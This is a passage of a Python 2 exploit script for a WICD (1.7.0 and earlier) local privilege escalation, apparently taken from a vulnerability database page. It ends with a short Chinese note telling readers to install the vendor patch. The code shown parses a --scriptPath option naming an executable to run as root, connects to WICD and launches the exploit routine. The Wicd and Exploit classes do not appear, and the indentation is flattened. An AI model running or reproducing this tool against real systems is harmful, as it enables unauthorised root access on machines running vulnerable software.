def usage():
print "[!] Usage:"
print " ( -h, --help ):"
print " Print this message."
print " ( --scriptPath= ): Required, executable to run as root."
print " --scriptPath=/some/path/to/executable.sh"
def main():
print "[$] WICD =< 1.7.0Day"
try:
opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="])
except getopt.GetoptError, err:
# Print help information and exit:
print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
usage()
sys.exit(0)
scriptPath=None
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit(0)
elif opt =="--scriptPath":
scriptPath=arg
else:
# I would be assuming to say we'll never get here.
print "[!] Parameter error."
usage()
sys.exit(0)
if not scriptPath:
print "[!] Parameter error: scriptPath not set."
usage()
sys.exit(0)
try:
wicd = Wicd()
except Error as error:
print "[!] WICD Error: %s" % (error.errorStr)
exit(0)
print "[*] WICD Connection Initialized! (Version: %s)" % (wicd.versionString)
if not wicd.versionLessThan(171):
print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow."
exploit = Exploit(wicd, scriptPath)
print "[*] Attempting to exploit:"
try:
exploit.exploit()
except Error as error:
print "[!] Exploit Error: %s" % (error.errorStr)
exit(0)
print "[*] Exploit appears to have worked."
# Standard boilerplate to call the main() function to begin
# the program.
if __name__=='__main__':
main()
建议:
--------------------------------------------------------------------------------
厂商补丁:
Wicd
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: